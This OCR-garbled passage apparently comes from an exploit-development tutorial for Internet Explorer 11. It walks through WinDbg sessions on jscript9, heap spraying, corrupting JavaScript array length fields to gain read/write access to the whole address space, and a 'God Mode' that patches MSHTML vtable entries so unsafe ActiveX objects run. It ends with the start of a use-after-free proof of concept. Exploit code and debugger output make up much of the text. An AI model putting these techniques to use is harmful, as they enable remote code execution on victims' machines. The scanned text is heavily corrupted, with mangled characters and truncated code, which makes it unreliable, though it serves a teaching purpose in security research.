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0:002» bc * 


0:002> x jscript9!*javascriptarray::javascriptarray* 


6f5c2480 jscript9! Js::JavascriptArray::JavascriptArray (<no parameter info>) 
6f5c7f42 jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>) 
6f4549ad jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>) 
6f47e091 jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>) 
0:002> bm jscript9!*javascriptarray::javascriptarray* 

1: 6#5с2480 @!"jscript9! Js::JavascriptArray::JavascriptArray" 

2: 6f5c7f42 @!"jscript9! Js::JavascriptArray::JavascriptArray" 

3: 6f4549ad @!"jscript9!Js::JavascriptArray::JavascriptArray" 

4: 6f47e091 @!"jscript9!Js::JavascriptArray::JavascriptArray" 





Here | got a weird error in WinDbg: 


Breakpoint 1's offset expression evaluation failed. 

Check for invalid symbols or bad syntax. 

WaitForEvent failed 

еах-00000000 ерх-00838е4с есх-00000000 едх-00000000 еві-00839р10 edi-00000000 
eip=7703fc92 esp=05d57350 ebp=05d573d0 iopl=0 nv up ei pl zr na pe nc 

cs=0023 ss-002b ds=002b es-002b fs-0053 gs=002b efl=00000246 

ма 2мОптар\іемОїЅесіоп+0х12: 

77031292 83c404 add еѕр,4 





Let me know if you know why this happens. To avoid this error, you can set the 4 breakpoints by hand: 


bp 6f5c2480 
bp 6f5c7f42 
bp 6f4549ad 
bp 6f47e091 





When we resume the execution and allow blocked content in IE, the second breakpoint is triggered and the 
stack trace is the following: 


0:007» k 8 
ChildEBP RetAddr 


0437Бае0 6da6c0c8 jscript9! Js::JavascriptArray::JavascriptArray 
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0437baf4 6d9d6120 jscript9! Js::JavascriptNativeArray::JavascriptNativeArray+0x13 


04376624 6da6bfc6 jscript9! Js::JavascriptArray::New<int,Js::JavascriptNativelntArray>+0x1 12 
04376634 6da6bf9c jscript9! Js::JavascriptLibrary::CreateNativelntArray+Ox1a 
0437bbf0 6da6c13b jscript9! Js::JavascriptNativelntArray::Newlnstance+0x81 


0437bff8 6d950aa3 jscript9!Js::InterpreterStackFrame::Process+0x48e0 

0437c11c 04са0Ге9 jscript9!Js::InterpreterStackFrame::InterpreterT hunk<1>+0x1e8 
WARNING: Frame IP not in any known module. Following frames may be wrong. 
0437c128 6d94ceab Ox4cdOfe9 





Let's delete all the breakpoints and put a breakpoint on JavascriptNativelntArray::Newlnstance: 


0:007» bc * 


0:007» bp jscript9!Js::JavascriptNativelntArray::NewInstance 





Reload the page and when the breakpoint is triggered, press Shift-F 11 to return from the call. EAX should 
now point to the JavascriptNativelntArray object: 
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ЕТ Pid 4412 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 
Rit [ыы аа DTE ЕЈ ЕДЫ | Aa | es 


| Previous | Display format: [Lon 


дайаһ) 
imp t9! unction 
nop 
nop 
nan 


Display format: | L 


iptNativeIntk 1 ! 


= «no type informat 


LnO, Col 0 SysQ:<Local> Proc 000:113с Thrd 007:1ac 





It seems that the buffer for the has space for just 4 elements. Or maybe that 4 elements are the 
header for the buffer? When the grows, a bigger buffer should be allocated and thus the pointer to the 
buffer in the object should change. So, let’s put a hardware breakpoint on the field: 


ба w4 (Qeax*14 


When we resume the execution, the hardware breakpoint is triggered and the stack trace looks like this: 


0:007» К 8 

ChildEBP RetAddr 

0437Бас0 6daf49a2 jscript9! Js::JavascriptArray::AllocateHead<int>+0x32 
0437baf0 6daf4495 jscript9! Js::JavascriptArray::DirectSetltem_Full<int>+0x28d 
0437bb44 6d94d9a3 jscript9! Js::JavascriptNativelntArray::Setltem+0x187 
04376670 03a860a6 jscript9! Js::CacheOperators::CachePropertyRead<1>+0x54 


WARNING: Frame IP not in any known module. Following frames may be wrong. 
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0437c0c8 6da618a7 0хЗа860аб 
0437c104 64950493 jscript9!InterpreterT hunkEmitter::GetNextThunk+0x4f 


0437c128 6d94ceab jscript9! Js::FunctionBody::EnsureDynamiclInterpreterT hunk+0x77 
0437c168 6d94d364 jscript9!Js::JavascriptFunction::CallFunction<1>+0x88 





As we expected, the grows when elements are added through 
. The new address of the buffer is . Now resume the 
execution, stop the execution again and have a look at the buffer at 5 


У | | Previous 


Big difference from IE 10 
in IE 11 (signed) integers 
in the buffer are written 
without any encoding! 





As we can see, the integers are written without any kind of encoding in the buffer. In IE 10 we would 
have had ‚ Le. . The only caveat is that ће integers are signed. Let's see what happens 
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when we write to the Array a value bigger than the biggest positive integer number. Let’s spray the heap to 
find one of the buffers more easily: 


XHTML 


language="ja\ 

= (); 

= 0; i < Ox1000; ++i) { 

rray((0x10000 - 0х20)/4); 
th; ++) 


ШЙ = 


ШО] = 0x80000000: 
) 





In WinDbg, go to an address like 9000000h or use VMMap to determine a suitable address. This time you'll 
see something familiar: 
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[ШЕ ај ЕЈ Op oOo ЕЙ А, 














ssembl 3| | Memory 





Offset: @$scopeip Virtual: 3000000 Previous |: Display format:|Long Hex ы Next 


но prior d s 03000000 01110 00000000 00000000 00000000 00003ЕЕ8 00003448 00000000 
ntdll!DbgE: 3 ЧОН 09000020 30) 247] 00000247 T 00000247 00000247 00000247 00000247 
09000040 7 00000247 00000247 00000247 00000247 00000247 
7030004 c3 09000060 241002 00000247 00000247 00000247 00000247 00000247 
3000e 50 0 0000024 00000247 00000247 00000247 00000247 00000247 
30008 90 р 09000630 00000247 00000240 00000247 00000247 00000247 00000247 00000247 
ntdll!KilserApcExcept ionHandler 0 00000247 345 00000247 00000247 00000347 00000247 00000547 00000247 
77030010 85462404 7 ecx, dword ptr [espe] E еп 00000247 00000247 00000247 00000247 00000247 00000247 00000247 00000247 
030014 £6410406 = byte ptr [есх+4],6 09000100 00000247 00000247 00000247 00000247 00000247 00000247 
0018 7405 j ntdlliKiUserApcÉxceptionHandler«Uxf (7703001£) 09000120 00000247 00000247 08000247 0000 00000247 00000247 0 00000247 
72030014 в8а1140100 > ntdll!ZwTestAlert (77041dc0) 09000140 П 0000 247 0000 7 00000247 00000247 
77030014 Ь801000000 қ езх,1 03000160 00000247 00000247 0247 00000247 00000242 00000247 00000247 
77030024 c21000 10h 09000180 00000247 00000247 2 0 00000247 00000247 
77030027 90 09000140 00000247 00000849 00000247 00000247 00000247 00000247 00000247 
030001с0 00000247 00000247 00000247 00000247 00000247 000002 47 7 

eax, [esp+2DCh] 08000160 00000247 00000247 0000024% 00000247 00000247 

48 0400000000 nov ecx. dword ptr #2:[0] 90 00000 00000247 00000247\00000247 0000 247 00000247 00000247 
203003 : Ба10000377 хот 53 at c mE seràpcExceptionHandler (77030010) 00000247 0 nnnnn242 mnnnn?4 00000247 00000247 00000247 

770307 8 xov word ptr [eax],ecx 3 0000247 10000247 00000247 000002 

nov dword ptr [eaxt+4]. edx A 09000260 00000247 Now the numbers 0x123 “7 00000247 00000247 00000247 
77030040 642300000000 xov dword ptr fs:[00000000h]. eax Pointer to a 03000280 00d are encoded like in IE 10 00000247 00000247 00000247 
77030046 58 Па) ван 09000240 00000247 == = r7 17 00000247 00000247 00000247 
77030047 847с240с Тав, edi, [esp+0Ch] JavascriptNumber 090002с0 00000247 00000247 00000247 00000247 00000247 00000247 00000247 00000247 
77030046 rian call eax 9 2 00000247 00000247 00000247 00000247 00000247 00000247 00000247 
27030049 xov вок. dvord ptr [edi+2CCh] 090 0 00000247 00000247 00000247 00000247 00000247 000 00000247 
77030083 64830a00000000 mov dword ptr fs:[0],ecx 3 00000247 00000247 00000247 00000247 00000247 00000247 00000247 00000247 
77030058 badi push 1 € 00000247 00000247 00000247 00000247 00000247 00000247 00000247 

7703005с 57 push 3 00000247 00000247 00000247 00000247 00000 00000247 00000247 











Command 





(113c.1240) EM instruction e 

eax=7ef 85000 7 ] 4 
7703000 8 eb 7e хор na pe nc 
ш 2 5 1=00000246 


0:017 
(1132. 1084): Break instruction exceptione code 80000003 (first chance) 
000 [i 00000000 ecx- 000 &dx-77Uübf8& =1=00000000 edi=00000000 
пу up ei pl zr па pe nc 
002b ef1=00000246 


0 BILE d 

()3a80£30 04092ае0 00000000 41e00000 
03aB0f£40 54711212 04092ае0 00000000 40100000 
03а80Ғ50 6494 8Ёс 04092аесй 00000000 40080000 
D3a80f60 5494 8 Ёс 04092ае0 40000000 
03880870 6494 98Ёс 04092ае0 00000000 3ЕЕ00000 
03=80#80 6494 98Ёс 04092ae0 00000000 00000000 
03а80Е90 6494 98їс 04092ае0 00000000 40080000 
03880840 6494498с 04092ae0 00000000 40000000 
0 -005> Ін Ба = 

(6d9449fc) _ jscript9!Js::JavascriptNumber: : vftable' | (64844654) jscript9!Js::JavascriptNativeFlostàrray: : vftable' 


JavascriptNumber vftable' = «no type information» 


їл0,Со!0 SysÜ:«Local- Proc 000:113с Thrd 005:1084 


This is the exact situation we had in IE 10: the numbers are encoded ( ) and first element, which 
should бе the number , points to a object. Is there a way to write 
directly? Yes: we need to find the negative number whose 2-complement representation is 

This number is 


0000000) = -0х80000000 


Let's try it: 
XHTML 


for (var i = 0; i < 0х1000; ++) ( 
|| = new y((0x10000 - 0х20)/4); 
for (var j = 0; j < a[i].JFength; ++j) 


ДІ 





а [0] = -0x80000000; 


alert("Done"); 
</script> 
</head> 
<body> 
</body> 
</html> 





As you can see, we get exactly what we wanted: 


Memory 
Virtual: 





We can conclude that in IE 11 an stores directly without any particular encoding. 
As soon as something different than a 32-bit signed integer is written into the , all the integers are 
encoded as just as in IE 10. This means that as long as we’re careful, we can use a normal as 
an . This is important because, as we said in the section EmulatelE9, won't be 
available. 


Reading/Writing beyond the end 


In IE 10 the length of an appears both in the object апа іп the header of the buffer. Let's 
see if things have changed in IE 11. Let's use the following code: 
XHTML 


<html> 
<head> 
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10000 - 0х20)/4): 





To determine the address of the Array, we can use the following breakpoint: 





bp jscript9!Js::JavascriptNativelntArray::Newlnstance+0x85 ".printf \"new Array: addr = Ох%р\\п\",еах;9" 


Here’s a picture of the Array object and its buffer: 
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Метогу ls 
Virtual: 0x04aaeb10 Display format: | Long Hex У | | Previous || Next | 


Üü4aaeblü ü4el4534 03526950 00000000 00000005 0031 13521010 0352э010| 00000000 
ü4aaeb3ü 00000000 033Е79а0 00000000 00000000 033720106035 2ере0 O4e20bla 
04ааен50 00000000 00000000 0514а360 00000101 04526000 00000090 00000000 00000000 
й4ааен70 03387940 ffffffff 033е10е8 ü33f?79ba"ffffffff 03362330 00000000 00000000 
ü4aaeb9?0 00000000 00000000 00000000 00000400 ü33f7a20 ff£ffffff 05195958 03387400 
О4ааеБЬ0 ffffffff 033-1330 033Е79Е0 ЁЇЁТЕРЕЁ 03361068 033Е79е0 00000001 03564640 
ü4aaebdü 03566е00 00020001 00000041,/00000009 00000002 00000003 00000003 00000247 
Odasebf0 03382140 03380820 00000080 00000000 033е1390 ffffffff 00000456 035696а0 
04ааес10 00000000 00000276 05166958 ffffffff 00000024 O33el0e8 ffffffff 00000229 
|хЇ (778:0018) 04ааес30 П4с25000 ffffj 000000 00000000 00000000 00000000 00000000 
04азес50 00000000 00008 0000000000004 00000004 033£7b50 04ааес30 
О4ааес70 tfffftrti 00000000 02557306 02Е56а00 00000000 00000000 00000000 
04ааес90 O36b6fc0 00000002 00000016 00000400 00000000 00000150 00000026 00000000 
П4ааесьй 00000001 00000000 00000000 00070000 ü36b6fcO ЕЕЕЕЕЕЕЕ 0000000а 00000000 
04азес90 00000000 00000000 00000000 00000000 

04азесЁ0 02557348 00000000 00000000/00000000 03570138 00000027 00000005 00000027 
04аае910 00000020 00000000 00000040 00000000 00000053 ЕЕЕЕЕЕЕЕ 051499598 ££££0701 
onHandler (77850010) ü4aaed3ü0 00000000 00000000 ££££8701 00000000 00000000 ££££0701 00000000 00000000 
ü4aaed5ü 00000063 ffffffff 05244с-48 ffffü?701 00000000 00000000 #ЕЕ#0701 00000000 
04азе970 00000000 ££££0701 20000000 00000000 00000053 ЕЕЕЕЕЕЕЕ 05199598 ffffü7Ul 
ü4aaed9?ü 00000000 00000000 ££££0701 00000000 00000000 ££££0701 00000000 00000000 
Odaaedb0 ü4el3f9c 03556260 03382110 00000000 0514а850 05198520 0000074: 00000000 
ü4aaeddü 00000000 6fastesf 00000000 00000000 00000003 ЕЕЕЕЕЕЕЕ 05149598 00010777 
Odasedf0 ЕЕЕЕЕЕЕЕ 08144080 00020143 ЕЕЕЕЕЕЕЕ 03939600 00030143 00000000 045889640 
04ааее10 04е13Ё 9с5,/03526440 00000000 00000000 0514а850 0514ас20 00000069 00000000 
ü4aaee3ü 000000 0 6э555941 00000000 00000000 04е13#9с 03552220 0355:340 00000000 
04азее50 05145650 0514ас20 00000743 00000000 00000000 6#30941= 00000000 00000000 














8| | Memory BE 
- Virtyaf 0352£010 Display format: | Long Hex т | Previous || Next 


[n352£018| 00000000 110003:Е8| 00000000 00000123 00000123 00000123 00000123 
3521) 030 00000123 00011123 00001213 80000002 80000002 80000002 80000002 80000002 
03528050 80000002 80000002 80000402 80000002 80000002 80000002 80000002 80000002 
03521070 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£090 80000002 80000002 80000000 80000002 80000002 80000002 80000002 80000002 
0352+0Ъ0 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
25\bin\deploy dll 0352Е040 80000002 80000002 80000002 \80000002 80000002 80000002 80000002 80000002 

0352#0#0 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352#110 80000002 /80000002 80000002 88000002 80000002 80000002 80000002 80000002 
03528130 pesansa anancang? gosea sanaca 57000002 80000002 80000002 80000002 
03528150 2 800 1000002 80000002 80000002 80000002 
03524170 8 О ОЛЛИ 2 —51)000002 80000002 80000002 80000002 
0352#190 80000002 80000002 80000002 80000002 80000002 80000002 
0352£1b0 Sororooz 80000002 80000002 80000002 80000002 80000002 80000002 
0352#140 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352#1#0 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
03528210 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
03528230 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352Е250 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£270 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£290 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352+2Ъ0 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£2d0 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352420 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
03528310 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352Е330 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£350 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 
0352£370 80000002 80000002 80000002 80000002 80000002 80000002 80000002 80000002 




















Let's use this code: 
XHTML 


<html> 
<head> 
<script language="javascript"> 
var array len = (0x10000 - 0x20)/4; 
- new Array(array len); 





alert("Modify the array length"); 
alert(a[array len]); 

</script> 

</head> 


<body> 
</body> 
</html> 





We want to modify the length so that we can read and write beyond the real end of the . Let's 
load the page in IE and when the first alert message appears, go in WinDbg and overwrite the length 
field in the object with . When we close the alert box, a second alert box appears with the 
message . This means that we couldn't read beyond the end of the 


Now let's try to modify the " " field in the header of the buffer (from 7 to 
): same result. 


Finally, modify the “ " field in the header of the buffer (from to ): same 
result. Butif we modify all the three length fields it works! Is it really necessary to modify all the three values 
by hand? An grow when we write at an index which is beyond the current length of the . If the 
buffer is too small, a big enough buffer is allocated. So what happens if we modify just the “ i 
field and then write at an index of the which is beyond the current length of the 2 If our logic 
doesn't fail us, IE should grow the without touching the buffer because IE thinks that the buffer is big 
enough (but we know we faked its size). In other words, IE should update the other two length fields as a 
consequence of writing to the beyond the current end of the 


Let's update our code: 
XHTML 


«html» 
«head» 
<script language="javascript"> 
ar array_len = (0х10000 - 0x20)/4; 
ir a = new Array(array len); 
for (var i = 0; i < 7; ++i) 
a[i] = 0x123; 
alert("Modify the \"Buffer length\" field"); 


a[array len + 0x100] = 0; 
alert(a[array len]); 





We load the HTML page in IE and when the first alert box appears we modify the " ” field in the 
buffer header. Then we resume execution and close the alert box. IE might crash because we could 
overwrite something important after the end of the . In that case, repeat the whole process. 


Now, when the second alert box appears, have another look at the object and at its buffer header: 
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Memory 


Previous 


We wrote at in 

which is Ox3ff8 + 0x100 = 0x40f8, and | 

the two length fields now contain the 
new length which is 0x40f8+1 


Memory 


Virtual: 055£0010 Display format:|Long Hex v | | Previous || 





Perfect! Again, understand that if we hadn't altered the " " field of the buffer, a new buffer of 
length at least would have been allocated, and we wouldn't have got read/write access to memory 
beyond the end of the 


Whole address space read/write access 


We want to acquire read/write access to the whole address space. To do so, we need to spray the heap with 
many , modify the “ " field in the buffer header of one ‚ locate the modified апа, 
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finally, use it to modify all three length fields of another 
wherever we want. 


Here's the javascript code: 
XHTML 


script language-" javascript" 


(function () { 
llectGarbage(); 


= 0x20; 
len = (0x10000 - h 


ew Array(); 
0; i < 0х1000; ++i) { 
ay(array_len); 


= 0xc000000; 


= -1; 
ar i = 0; і < 0х1000 - 1; ++i) { 


п + header. size/4] = 1; 


if (aie 0] == 1) {_ 


+ Ox14/4] = ОХЗНН 
len + 0x18/4] = Ox3fffffff: 
th = Oxafffffff; 


Ir + 0x10000 + | 


. We'll use this second to read and write 


http: 
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The header size for the buffer of an Array is 0x20 because there is a 0x10-byte heap allocation header and 
a 0x10-byte buffer header. 


magic_addr is the address where the Array whose length we want to modify is located. Feel free to change 
that value. 


To determine the index of the modified Array we consider each Array in order of allocation and try to modify 
the first element of the following Array. We can use ali] to modify the first element of a[i 1] if and only if afi] is 
the modified array and the buffer of a[i+1] is located right after the buffer of a[i] in memory. If afi] is not the 
modified Array, its buffer will grow, i.e. a new buffer will be allocated. Note that if we determined that a[idx] is 
the modified Array, then it's guaranteed that the buffer of a[idx* 1] hasn't been reallocated and is still located 
right after the buffer of a[idx]. 


Now we should be able to read/write in the address space [base addr, Ох, but what about [0, 

base addr]? That is, can we read/write before the buffer of a[idx- 1]? Probably, IE assumes that the base 
addresses and the lengths of the Arrays are correct and so doesn't check for overflows. Let's say we want to 
read the dword at 0x400000. We know that base addr is 0xcO 10000. 


Let's suppose that IE computes the address of the element to read as 


базе адаг + index*4 = 0хс010000 + index*4 


without making sure that index*4 < 2°32 – base адаг. Then, ме can determine the index to read the dword 
at 0x400000 as follows: 

0хс010000 + іпдех*4 = 0х400000 (тоа 2^32) 

index = (0400000 - 0хс010000)/4 (тоа 2^32) 

іпаех = (0х400000 + 0 - 0хс010000)/4 (тоа 2^32) 


іпаех = (0х400000 + 2732 - 0хс010000)/4 (тоа 2732) 
паех = 0хЗа0їс000 (тоа 2^32) 





The notation 


а= b (mod М) 


means 


а= b + k*N for some integer К. 


For instance, 
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12 =5 (mod 7) 


because 

Working with 32 bits in presence of overflows is like working in . For instance, 

-5 = 0 - 5 = 2432 - 5 Oxfffffffb 

because, in , 0 and are equivalent ( ). 

To recap, if IE just checks that (which is in our case) and doesn't do any 
additional check on potential overflows, then we should be able to read and write in . Here’s the 
implementation of the functions and 

JavaScript 


int2uint(x) { 
irn (x < 0) ? 0x100000000 + x : x; 


ion uint2int(x) 4 
irn (x >= 0x80000000) 2 x - 0x100000000 : x; 


tion read(addr) { 


ir delta = addr - базе addr; 
r val; 

f (delta >= 0) 

val = a[idx- 1][delta/4]; 


val = alidx+1][(0x100000000 + delta)/4]; 


int2uint(val); 





write(addr, val) { 
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Vid 1] 0х100000000 + delta)/4] = 


We've already noted that contains signed 32-bit integers. Since | prefer to work with unsigned 32-bit 
integers, | perform some conversions between signed and unsigned integers. 


But we haven't checked if all this works yet! Here's the full code: 
XHTML 


language="javascript" 


(function () { 
t (); 


var | = 0х20; 
rarray len = (0x10000 - h 


(); 
0; i < 0x1000; ++) ( 


(а! ); 


= 0xc000000; 


V =-1 
for (var i = 0; i < 0х1000 - 1; ++) { 
y еп + 2е/4] = 1; 


и (ali+ 1110] == 1) { 
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п + 0x14/4] = Ox3fffffff; 
+ 0x18/4] = Ox3fffffff; 
па = OxSfffffff; 
addr = mag idr + 0x10000 + 


п int2uint(x) { 
< 0) ? 0x100000000 + 


п uint2int(x) { 
1 (x >= 0x80000000) ? x - 0x100000000 : x; 


lidx+1][(0x100000000 + delta)/4]; 


110 ta/4] = 


| x--1]I(0x100000000 + lelta)/4] = 
} 
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num = read(base_addr - 0х10000); 
alert("Did you write the number " + num.toString(16) + "?"); 


alert("Done"); 
DO; 
</script> 
</head> 
<body> 
</body> 
</html> 





To check if everything works fine, follow the instructions. Try also to write a number such as 
. Lucky for us, everything seems to be working just fine! 


get_addr function 
The function is very easy to write: 


JavaScript 


n get addr(obj) { 
апах+2][0] = obj; 
гп read(base addr + 0x10000); 





) 
alert(get addr(ActiveXObject).toString(16)); 


Note that we can't assign obj to because this would make IE crash. In fact, would 
become a mix and IE would try to encode the dwords of the entire space address! We can’t use 
for the same reason and we can't use or previous because their buffers were reallocated 
somewhere else (remember?). So, seems like a good candidate. 

Соа Моае 


Now ме need to port the God Mode from IE 10 to IE 11. Let’s start with the first few lines: 
JavaScript 


jscript9 = read(0xOcOaf000) - 0х3060; 
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r addr = get addr(document.createElement("div")); 
alert(addr.toString(16)); 





mshtml = read(addr + 0x10) - 0x58b9a; 


When the alert box pops up, examine the memory at the indicated address and you should have all the 
information to fix the code. Here’s the fixed code: 


JavaScript 


ar addr = get addr(document.createElement("div")); 
jscript9 = read(addr) - 0х2450; 
mshtml = read(addr + 0x10) - 0x1569ce; 





Now let’s analyze ‚ if still present. First of all, add this simple line of 
code: 


JavaScript 





ActiveXObject("ADODB.Stream"); 


Then, load the page in IE and add a breakpoint on . When the 
breakpoint is triggered, step through the code until you reach a call to | 


04с05а81 е84а000000 call jscript9!ScriptSite::CreateObjectFromProgID (04с05а90) 
Step into it (F11) and then step until you reach 


04c05b4c 8d45e8 lea | eax,[ebp-18h] 
04205541 50 push eax 
04с05650 е86с020000 call jscript9!ScriptEngine::CanCreateObject (04с059с1) 


04c05b55 85c0 test eax,eax 
04c05b57 018414150400 je jscript9!ScriptSite::CreateObjectFromProgID+0x116 (04c47 151) 





Step into it (F11) and step until you get to the virtual call: 


04c05df0 8d55f8 lea edx,[ebp-8] 
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O4cO5df3 ба00 push 0 

O4cO5df5 6a00 push 0 

04c05df7 6a10 push 10h 

04c05df9 #7508 push dword ерр-8| 

04c05dfc 8b08 mov есх,амога ptr [eax] 

04c05dfe 6a04 push 4 

04c05e00 52 push edx 

04c05e01 6800120000 push 1200h 

04c05e06 50 push eax 

04c05e07 ff5110 call dword ptr [ecx+10h] ds:002b:702bcda8={MSHTML!TearoffThunk4 (6f686f2b)} < 
04c05e0a 85c0 test eax,eax 

04c05e0c 7811 js jscript9!ScriptEngine::CanCreateObject+0x5e (04c05e1f) 
04c05e0e f645f80f test byte ptr [ebp-8],0Fh 

04c05e12 ба00 push 0 

04c05e14 58 pop еах 

04c05e15 0f94c0 sete al 

04c05e18 5e pop esi 

04c05e19 8be5 mov  esp,ebp 

04c05e1b 5d 

04с05е1с с20400 





In IE 10 we went to great lengths to return from CanCreateObject with a non null ЕАХ and a null EDI. But as 
we can see, in IE 11 there is no pop edi. Does it mean that we can just call the function epilog (which 
doesn't use leave anymore, by the way)? 


Let's gather some useful information: 


0:007» In ecx 
(702bcd98) MSHTML!s apfnPlainTearoffVtable | (702bd4a0) MSHTML!GLSLFunctionInfo::s info 


Exact matches: 


MSHTML!s apfnPlainTearoffVtable = «no type information? 
0:007» ? 702bcd98-mshtml 
Evaluate expression: 15453592 - 00ebcd98 
0:007> 2 04с05е19-јѕсгірі9 
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Evaluate expression: 1400345 = 00155e19 


Now let's step out of CanCreateObject (Shift+F 11): 


04с05650 е86с020000 call jscript9!ScriptEngine::CanCreateObject (04c05dc1) 


04c05b55 85с0 test eax,eax we are here 

04c05b57 0184144150400 је jscript9!ScriptSite::CreateObjectFromProgID+0x116 (04c47 151) 
04c05b5d 6205 push 5 

04c05b5f 58 рор еах 

04c05b60 851 test еседі EDI must be 0 


04c05b62 Of85fd351200 jne jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x61a58 (0442 
9165) 





It seems that ED! must still be 0, but the difference is that now CanCreateObject doesn’t use ED! anymore 
and so we don't need to clear it before returning from CanCreateObject. This is great news! 


Let's change EAX so that we can reach CanObjectRun, if it still exists: 


r eax-1 


Let's keep stepping until we get to CanObjectRun and then step into it. After a while, we'll reach a familiar 
virtual call: 

04с05а2с 53 push ебх 

04с05а2а ба18 push 18h 

04c05d2f 52 push едх 

04c05d30 8d55cc lea edx,[ebp-34h] 

04c05d33 895de8 mov  dword ptr [ebp-18h],ebx 

04c05d36 8b08 mov  ecx,dword ptr [eax] 

04c05q38 52 push едх 


04c05d39 8d55c0 lea | edx,[ebp-40h] 

04c05d3c 52 push едх 

04c05d3d 68845dc004 push offset jscript9!GUID CUSTOM CONFIRMOBJECTSAFETY (04c05d84) 
04c05d42 50 push eax 

04c05d43 #5114 call dword ptr [ecx* 14h] ds:002b:702bcdac-(MSHTML!TearoffThunk5 (6f686efc)) < 
04c05d46 85с0 test eax,eax 


04c05d48 01889с341200 js  jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x61add (0492 
91ea) 
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04c05d4e 8b45c0 mov eax,dword ptr [ebp-40h] 

04c05d51 6a03 push 3 

04c05d53 5b pop ебх 

04c05d54 85с0 test eax,eax 

04с05456 7401 ПАШ jscript9!ScriptEngine::CanObjectRun+Oxaa (04c05d67) 
04c05d58 837dcc04 стр dword ptr [ebp-34h],4 

04c05d5c 7202 jb —_jscript9!ScriptEngine::CanObjectRun+0xa3 (04c05d60) 
04c05d5e 8b18 mov  ebx,dword ptr [eax] 

04205460 50 push eax 

04c05d61 #1518а0е704 call dword ptr [jscript9! imp CoTaskMemFree (04е7а018)] 
04c05d67 6200 push 0 

04с05469 f6c30f test bl,OFh 

04с05абс 58 pop еах 

04c05d6d 0f94c0 sete al 

04c05d70 8b4dfc mov  ecx,dword ptr [ebp-4] 

04c05d73 5f рор edi 

04c05d74 5e pop esi 

04c05d75 33cd хог  ecx,ebp 

04c05d77 5b pop ебх 

04c05d78 e8b8b3eaff call jscript9! security check cookie (04ab1135) 
04с05а7а 8be5 mov  esp,ebp 

04c05d7f 5d pop  ebp 

04c05d80 c20800 ret 8 





If we call the epilog of the function like before, we'll skip the call to jscript9! imp  CoTaskMemFree, but that 
shouldn't be a problem. ECX points to the same vftable referred to in CanCreateObject. Let's compute the 
RVA of the epilog of CanObjectRun: 


0:007» 2 04c05d7d-jscript9 
Evaluate expression: 1400189 = 00155d7d 





Now we're ready to write the javascript code. Here's the full code: 
XHTML 
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rit | language-"javascript" 
n () { 
G (); 
= 0x20; 
n = (0x10000 - | 
(); 
r i = 0; i < 0х1000; ++i) { 
(array len); 


= 0xc000000; 


gth\" field of the Array at Ox" + 


Ша; ==]: 
г (var i = 0; i < 0х1000 - 1; ++i) { 


if (ali+ 1110] == 1) { 


an't find the modified Array"); 


п + 0x14/4] = Ox3fffffff; 
+ 0x18/4] = Ox3fffffff; 
= Ox3fffffff; 
г = magic_addr + 0x10000 + 
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return (x < 0) ? 0x100000000 + 


lint2int(x) { 
eturn (x >= 0x80000000) ? x - 0x100000000 : x; 


: di | +1][(0x100000000 + lelta)/4]; 


i (еа sen | 
ix+1][delta/4] = val; 


[ ix+4][(0x100000000 + leltay/4] = 


function iddr(obj) { 
li еа DJ; 


retur 


+ 0х10000), 


_addr(document 
idr) - 0x2d50; 
Ir + 0x10) - 0x1569ce; 


+0xebcd98+0x10); 
tml+0xebcd98+0x14); 


http: 
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html+0xebcd98+0x10, јѕсгірі9+0х155е19); 
tml+Oxebcd98+0x14, jscript9+0x155d7d); 


leOff() { 
іті-Охерса98--0х10, 
+0херса98+0х14, 


function 


var 151 
Val i 


n ада! ldr(bStream); 
ir = ( ( im. addr + 0x50) + 0x44); 


addr, 0х003а0043); 
r + 4, 0x0000005c); 


(fi 22) 


gh * 0x100)); 
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| snipped . You сап download the ІШІ code from here: соде5. 


Try the code and it should work just fine! 


The UAF bug 


We'll be using a UAF bug | found here: 
https://withgit.com/hdarwin89/codeengn-2014-ie-1day-case-study/tree/master 
Here's the POC: 

XHTML 


xmlns:v="urn:schemas-microsoft-com:vml" 
| id="haed" 
IE Case Study - STEP1 


v\:*{Behavior: url(#default#VML)} 


| t http-equiv="X-UA-Compatible" content="IE=EmulatelE9" 
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} 


</script> 


</head> 
<body><v:group id="vml" style="width:500pt;"><div></div></group></body> 
</html> 





Enable the flags HPA and UST for iexplore.exe in gflags: 


Global Flags 


System Registry | Kernel Flags ile | Silent Process Exit | 


Image: (TAB to refresh) Launch 


[ Stop on exception [ Disable stack extension 
Г Show loader snaps 


Enable heap tail checking [ Enable system critical breaks 
_ Enable heap free checking - Disable heap coalesce on free 


Enable heap parameter checking 
Enable heap validation on сай! JST Цас | Enable exception logging 


Enable application verifier — НРА Пад 
|v Enable page heap 


Enable heap ta 
[ Early critical section event creation 
| Stop on user mode exception 


Enable heap tagging by DLL [ Disable protected DLL verification 
[ Ignore asserts 
Load image using large pages if possible 
Debugger ттутттттттттттттэзч 
Stack Backtrace: (Megs) | 





When we open the page in IE, IE will crash here: 


MSHTML!CMarkup::IsConnectedToPrimaryMarkup: 
Оаа9а244 8b81a4000000 том 


0aa9a24a 56 push esi 
0aa9a24b 85с0 test eax,eax 
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Оаа9а244 0#848ааа0800 је  MSHTML!CMarkup::IsSConnectedToPrimaryMarkup+0x77 (0ab24cdd) 
Оаа9а253 8b400c mov еах,дмога ptr [eax* OCh] 


0aa9a256 85с0 test eax,eax 





